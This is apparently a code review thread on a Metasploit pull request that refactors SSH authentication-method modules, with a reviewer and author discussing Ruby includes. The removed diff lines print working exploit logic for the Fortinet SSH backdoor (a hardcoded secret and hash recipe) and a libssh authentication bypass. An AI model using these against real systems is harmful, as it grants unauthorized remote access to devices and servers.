lib/msf/core/exploit/ssh/auth_methods.rb

```diff
@@ -1,193 +1,11 @@
-          ...
-          string    prompt[num-prompts] (ISO-10646 UTF-8)
-          boolean   echo[num-prompts]
-=end
-          name        = message.read_string
-          instruction = message.read_string
-          _           = message.read_string
-
-          prompts = []
-
-          message.read_long.times do
-            prompt   = message.read_string
-            echo     = message.read_bool
-            prompts << [prompt, echo]
-          end
-
-          debug { 'Sending SSH_MSG_USERAUTH_INFO_RESPONSE' }
-
-          send_message(Net::SSH::Buffer.from(
-=begin
-            byte      SSH_MSG_USERAUTH_INFO_RESPONSE
-            int       num-responses
-            string    response[1] (ISO-10646 UTF-8)
-            ...
-            string    response[num-responses] (ISO-10646 UTF-8)
-=end
-            :byte,   USERAUTH_INFO_RESPONSE,
-            :long,   1,
-            :string, custom_handler(name, instruction, prompts)
-          ))
-        else
-          raise Net::SSH::Exception, "Received unexpected message: #{message.inspect}"
-        end
-      end
-    end
-
-    # http://seclists.org/fulldisclosure/2016/Jan/26
-    def custom_handler(title, instructions, prompt_list)
-      n = prompt_list[0][0]
-      m = Digest::SHA1.new
-      m.update("\x00" * 12)
-      m.update(n + 'FGTAbc11*xy+Qqz27')
-      m.update("\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70")
-      h = 'AK1' + Base64.encode64("\x00" * 12 + m.digest)
-      [h]
-    end
-  end
-
-  #
-  # https://tools.ietf.org/rfc/rfc4252.txt
-  #
-  class Net::SSH::Authentication::Methods::LibsshAuthBypass < Net::SSH::Authentication::Methods::Abstract
-    def authenticate(service_name, username, password = nil)
-      debug { 'Sending SSH_MSG_USERAUTH_SUCCESS' }
-
-      # USERAUTH_SUCCESS is OOB and elicits no reply
-      send_message(Net::SSH::Buffer.from(
-=begin
-        byte      SSH_MSG_USERAUTH_SUCCESS
-=end
-        :byte, USERAUTH_SUCCESS
-      ))
-
-      # We can't fingerprint or otherwise reduce false positives using a session
-      # channel open, since most implementations I've seen support only one
-      # session channel and don't support channel closing, so this would block
-      # us from getting a shell
-      #
-      # Secondly, libssh doesn't send a CHANNEL_OPEN_FAILURE when we're not
-      # authed, so we have to wait for a timeout on CHANNEL_OPEN to return false
-
-      # So assume we succeeded until we can verify
-      true
-    end
-  end
+require 'msf/core/exploit/ssh/auth_methods/fortinet_backdoor'
+require 'msf/core/exploit/ssh/auth_methods/libssh_auth_bypass'
+require 'msf/core/exploit/ssh/auth_methods/malformed_packet'
 
+module Msf::Exploit::Remote::SSH::AuthMethods
+  include Msf::Exploit::Remote::SSH::AuthMethods::FortinetBackdoor
+  include Msf::Exploit::Remote::SSH::AuthMethods::LibsshAuthBypass
+  include Msf::Exploit::Remote::SSH::AuthMethods::MalformedPacket
 end
```

Comment:
```suggestion
```

I might be missing something important, but I don't think this should be needed? 👀 

If I understand correctly the net ssh auth_methods are derived directly from `Net::SSH::Authentication::Methods` constants:

```
[1] pry(#<Net::SSH::Authentication::Session>)> whereami

From: /Users/adfoster/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/net-ssh-6.1.0/lib/net/ssh/authentication/session.rb:80 Net::SSH::Authentication::Session#authenticate:

    75:               attempted << name
    76: 
    77:               debug { "trying #{name}" }
    78:               begin
    79:                 require 'pry'; binding.pry
 => 80:                 auth_class = Methods.const_get(name.split(/\W+/).map { |p| p.capitalize }.join)
    81:                 method = auth_class.new(self, key_manager: key_manager, password_prompt: options[:password_prompt])
    82:               rescue NameError
    83:                 debug {"Mechanism #{name} was requested, but isn't a known type.  Ignoring it."}
    84:                 next
    85:               end

[2] pry(#<Net::SSH::Authentication::Session>)> name.split(/\W+/).map { |p| p.capitalize }.join
=> "KeyboardInteractive"
[3] pry(#<Net::SSH::Authentication::Session>)> Methods
=> Net::SSH::Authentication::Methods
[4] pry(#<Net::SSH::Authentication::Session>)> Methods.constants
=> [:KeyboardInteractive, :Password, :Publickey, :MalformedPacket, :LibsshAuthBypass, :Hostbased, :Abstract, :None, :FortinetBackdoor]
```

And [includes](https://docs.ruby-lang.org/en/2.2.0/Module.html#method-i-include) may include constants, but those constants are already under the `Msf::Exploit::Remote::SSH::AuthMethods` namespace without this code:

```
[5] pry(#<Net::SSH::Authentication::Session>)> Msf::Exploit::Remote::SSH::AuthMethods.constants
=> [:FortinetBackdoor, :LibsshAuthBypass, :MalformedPacket]
```

So I _think_ this isn't needed? 🤞

Reply:
Oh, hmm, I'll check that out. Thanks!

Reply:
Ah, looks like I packaged everything in individual classes already. I should need only `require`. Thanks for catching that!